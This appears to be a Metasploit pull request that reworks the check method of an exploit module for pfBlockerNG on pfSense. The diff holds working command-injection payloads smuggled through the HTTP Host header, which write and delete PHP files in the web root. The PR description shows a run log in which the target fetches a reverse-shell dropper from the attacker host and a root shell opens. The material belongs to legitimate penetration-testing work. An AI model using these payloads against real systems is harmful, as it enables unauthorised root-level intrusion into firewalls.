### PR TITLE
Pfsense PfBlockerNG RCE module check method improvement

### DIFF
--- a/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
+++ b/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     check_resp = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "/#{test_file_name}"),
+      'uri' => normalize_uri(target_uri.path, "/#{test_file_name}")
     )
     return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || !check_resp.code == 200 || !check_resp.body.include?(test_file_content)
 

--- a/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
+++ b/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
@@ -106,15 +106,26 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    upload_shell
-    check_resp = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}"),
-      'vars_post' => {
-        @parameter_name.to_s => 'id'
+    test_file_name = Rex::Text.rand_text_alpha(4..12)
+    test_file_content = Rex::Text.rand_text_alpha(4..12)
+    test_injection = <<~EOF
+      <?php echo file_put_contents('/usr/local/www/#{test_file_name}','#{test_file_content}');
+    EOF
+    encoded_php = test_injection.unpack('H*')[0].upcase
+    send_request_raw(
+      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
+      'headers' => {
+        'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"
       }
     )
-    return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || check_resp.body.nil? || !check_resp.body.include?('uid=0(root) gid=0(wheel)')
+    sleep datastore['WfsDelay']
+    register_file_for_cleanup("/usr/local/www/#{test_file_name}")
+
+    check_resp = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "/#{test_file_name}"),
+    )
+    return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || !check_resp.code == 200 || !check_resp.body.include?(test_file_content)
 
     Exploit::CheckCode::Vulnerable
   end
@@ -133,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    upload_shell unless datastore['AutoCheck']
+    upload_shell
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
     case target['Type']
     when :unix_cmd

--- a/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
+++ b/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
@@ -119,7 +119,6 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
     sleep datastore['WfsDelay']
-    register_file_for_cleanup("/usr/local/www/#{test_file_name}")
 
     check_resp = send_request_cgi(
       'method' => 'GET',
@@ -127,6 +126,17 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || !check_resp.code == 200 || !check_resp.body.include?(test_file_content)
 
+    # Clean up test webshell "/usr/local/www/#{test_file_name}"
+    clean_up_injection = <<~EOF
+      <?php echo unlink('/usr/local/www/#{test_file_name}');
+    EOF
+    encoded_clean_up = clean_up_injection.unpack('H*')[0].upcase
+    send_request_raw(
+      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
+      'headers' => {
+        'Host' => "' *; echo '16i #{encoded_clean_up} P' | dc | php; '"
+      }
+    )
     Exploit::CheckCode::Vulnerable
   end
 


### PR DESCRIPTION
Previously if only the check method was run the module left behind a php shell on the target. Now if only the check method is run it leaves a file with a random name with random contents. 

As per: https://github.com/rapid7/metasploit-framework/pull/17032#discussion_r998390023
## Verification

Both the test file used in the check and the webshell used to spawn the session are cleaned up once the session is opened:
```
msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > reload
[*] Reloading module...
runmsf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Uploading shell...
[*] Webshell name is: yNiuHvETj.php
[*] Executing BSD Dropper for bsd/x64/shell_reverse_tcp
[*] Using URL: http://172.16.199.1:8080/nKkxrNzSWGWEkeG
[*] Client 172.16.199.130 (curl/7.76.1) requested /nKkxrNzSWGWEkeG
[*] Sending payload to 172.16.199.130 (curl/7.76.1)
[+] Deleted /usr/local/www/yBGbKl
[+] Deleted /usr/local/www/yNiuHvETj.php
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.130:14979) at 2022-10-19 22:03:09 -0400
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.

id
uid=0(root) gid=0(wheel) groups=0(wheel)
```